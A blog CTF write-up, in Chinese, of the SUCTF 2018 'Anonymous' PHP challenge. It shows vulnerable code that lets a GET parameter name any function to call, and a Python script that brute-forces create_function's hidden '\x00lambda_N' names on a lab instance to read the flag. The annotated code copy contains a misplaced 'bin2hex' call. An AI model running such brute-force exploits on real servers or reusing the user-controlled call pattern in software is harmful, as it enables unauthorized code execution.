SUCTF 2018——Anonymous(create_function 函数 的 php匿名函数 _x00lambda_)

最新推荐文章于 2024-07-11 18:55:16 发布
最新推荐文章于 2024-07-11 18:55:16 发布
阅读量360 收藏 4
点赞数 3
分类专栏: CTF#WEB 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/140131522
版权 
<?php

$MY = create_function("","die(`cat flag.php`);");
$hash = bin2hex(openssl_random_pseudo_bytes(32));
eval("function SUCTF_$hash(){"
    ."global \$MY;"
    ."\$MY();"
    ."}");
if(isset($_GET['func_name'])){
    $_GET["func_name"]();
    die();
}
show_source(__FILE__);

<?php
$MY = create_function("","die(`cat flag.php`);");
//创建一个$MY的匿名函数,函数的作用是输出flag
//匿名函数其实是有真正的名字,为%00lambda_%d(%d格式化为当前进程的第n个匿名函数,n的范围0-999)
$hash = (openssl_random_pseudo_bytes(32));
//生成一个随机数
eval("function SUCTF_$hash(){"
."global \$MY;"."\$MY();".
"}");
//创建$hash会在eval函数中。与SUCTF拼接。形成一个新的函数名
要想拿到flag就只有调用SUCTF_XXXX随机数的函数名。或者直接调用$MY
if(isset($_GET['func_name'])){
   	 $_GET["func_name"]();
   	 bin2hex die();
	// bin2hex()函数把ASCII字符的字符串转换为十六进制值
}
show_source(__FILE__);

create_function的匿名函数也是有名字的,名字是\x00lambda_%d,其中%d代表他是当前进程中的第几个匿名函数
所以直接爆破就好
exp

import requests

url = "http://e405e298-ac8d-4f70-9202-bea09304a052.node5.buuoj.cn:81/"

# 创建一个 Session 对象以保持持久连接
session = requests.Session()

for i in range(1000):
    try:
        # 构造请求的参数
        params = {'func_name': '\x00lambda_%d' % i}

        # 发送请求
        r = session.get(url, params=params)

        # 检查响应中是否包含 'flag' 字符串
        if 'flag' in r.text:
            print(r.text)
            break
    except requests.RequestException as e:
        # 处理请求异常
        print("Request failed:", e)

    # 减少输出频率,每50次输出一次提示信息
    if i % 50 == 0:
        print("Testing lambda_%d..." % i)

image.png

小龙_(R0 Team)
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JavaScript 匿名函数anonymous function)与闭包(closure)
01-19
匿名函数 闭包 变量作用域 函数外部访问函数内部的局部变量 用闭包实现私有成员 引入 闭包是用匿名函数来实现。闭包就是一个受到保护的变量空间,由内嵌函数生成。“保护变量”的思想在几乎所有的编程语言中都...
PHP匿名函数和use子句用法实例
12-19
PHP编程语言中,匿名函数,也称为闭包,是一种没有名称的函数,它可以捕获其定义时的作用域内的变量。这种功能使得开发者能够在需要时动态创建和使用函数,而无需预先定义。`use`子句是与匿名函数密切相关的,它...
SUCTF 2018——Anonymousphp匿名函数 \x00lambda_
weixin_30810583的博客
10-19 234
题目地址:http://45.76.173.177:23334/ 1 <?php 2 $MY = create_function("","die(`cat flag.php`);"); 3 $hash = bin2hex(openssl_random_pseudo_bytes(32)); 4 eval("function SUCTF_$hash(...
命令执行漏洞php函数,PHP create_function注入命令执行漏洞
weixin_35755562的博客
03-16 468
PHP中使用create_function()创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给create_function()执行任意命令。以如下代码为例://how to exp this code$sort_by=$_GET['sort_by'];$sorter='strnatcasecmp';$databases=array('test','test');$s...
[php代码审计]之create_function()函数
o3Ev的博客
04-14 1613
[php代码审计]之create_function 这篇文章结合了许多师傅的博客,再加上了一点我自己的心得 文章目录creat_function()介绍使用官方手册使用实际例子0x010x02代码分析参考博客 creat_function()介绍 适用范围:php4>=4.0.1,php5,php7 功能: 根据传递的参数创建匿名函数,并为其返回唯一名称 语法: creat_function(string $agrs,string $code) //string $agrs 声明的函数变量部分 //s
create_function() 代码注入,,PHP7.2竟然还存在
热门推荐
烟敛寒林的博客
05-09 1万+
第一部分:php函数 create_function() 介绍 理论: create_function()主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 stringcreate_function (string$args ,string$code ) string$args变量部分 string$code 方法代码部分 举例: create...
PHP匿名函数(闭包函数)详解
01-03
PHP匿名函数Anonymous functions),也叫闭包函数( closures ),允许临时创建一个没有指定名称的函数。经常用作回调函数(callback)的参数。 当然,也有其他应用的情况。 注:php闭包是PHP5.3版本之后才有...
实验报告_MATLAB函数文件程序设计_
09-29
4. **匿名函数Anonymous Function)**:无需命名,可以直接赋值给变量或作为参数传递。 三、函数的调用与返回 MATLAB中的函数调用非常直观,只需在命令行或另一个函数中输入函数名及所需参数。函数执行完毕后,...
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 738
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
数据结构第14节 加权图
hummhumm的专栏
07-07 1331
( V ) 是顶点的集合。( E ) 是边的集合,每条边连接 ( V ) 中的一对顶点。( W ) 是一个函数,将每条边映射到一个实数上,即 ( W: E \rightarrow \mathbb{R} )。
Laravel Excel导出功能:高效实现数据导出
liuxin33445566的博客
07-08 1158
Laravel Excel导出功能允许开发者将查询结果或其他数据集合转换成Excel格式的文件。这不仅可以提高数据交换的效率,还可以提升用户体验。Laravel Excel支持自定义导出格式,包括自定义单元格样式、合并单元格、添加图片等。这可以通过实现WithEvents等接口来实现。
Vulnhub靶场DC-6练习
Reset
07-08 957
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权。
sqlmap使用之-post注入、head注入(ua、cookie、referer)
最新发布
weixin_51520483的博客
07-11 104
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
wordpress网站添加一个临时维护功能
爱酷码的博客
07-07 291
有时遇到一些情况,比如站点需要闭站备案、或者被要求停站等等,我们就可以使用本文的功能,使我们的 wordpress 站点一键进入站点维护模式:打开站点的任意链接都显示“站点维护中”的字眼,而且返回 503 响应码比整站关闭对搜索引擎更加友好~把以下代码放到functions.php文件中,主要用网站临时维护或者用于备案。事情做好了,把以下代码删除即可!
【pbootcms】新环境搭建环境安装时发生错误
艾塔SEO
07-11 82
至此测试成功,可以正常访问后台。新环境安装后台,第一时间替换授权代码,再进行其他操作。2、数据库信息是否替换(根目录下/config/database.php 文件)3、重新删除runtime目录(runtime文件夹为缓存文件夹)1、试着删除根目录下runtime目录,刷新页面重试。3、检查服务器环境pathinfo及伪静态规则配置;【pbootcms】新环境搭建环境安装时发生错误。2、检查系统会话文件存储目录是否具有写入权限;
网关、DHCP协议、ip地址、子网掩码简单介绍
mantouyouyou的博客
07-11 594
参考文章:https://baike.baidu.com/item/%E7%BD%91%E5%85%B3/98992?fr=ge_ala。
PHP灵活用工任务小灵通微信小程序系统源码
2401_84413757的博客
07-08 488
🤔 别担心,灵活用工任务小灵通微信小程序拥有智能匹配系统,它会根据你的技能标签、工作经验和空闲时间,为你精准推荐最适合的任务。🔍 这样一来,你不仅能发挥自己的优势,还能在高效完成任务的同时,享受工作的乐趣!🤔 灵活用工任务小灵通微信小程序,汇聚了各行各业的灵活用工任务,从文案撰写、设计制图到市场推广、客服服务,应有尽有!💼 只需动动手指,就能浏览到海量任务列表,随时随地接单,轻松赚取额外收入,让你的生活更加丰富多彩!在灵活用工任务小灵通微信小程序里,你不仅能找到兼职任务,还能结识一群志同道合的伙伴!
php file_get_contents https 请求 伪造user_agent
希望我的博客,能帮上你解决学习中工作中所遇到的问题,也期待与您一起探讨技术问题,共同成长。
07-11 127
file_get_contents()函数来发起HTTPS请求时
php 匿名函数 catch,PHP匿名函数
05-30
PHP匿名函数Anonymous Functions)也被称为闭包(Closures),是一种没有名字的函数。它们可以像普通函数一样被调用和传递,但是不需要定义在全局作用域内,而是可以在需要时动态地创建和使用。 在使用匿名函数时...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值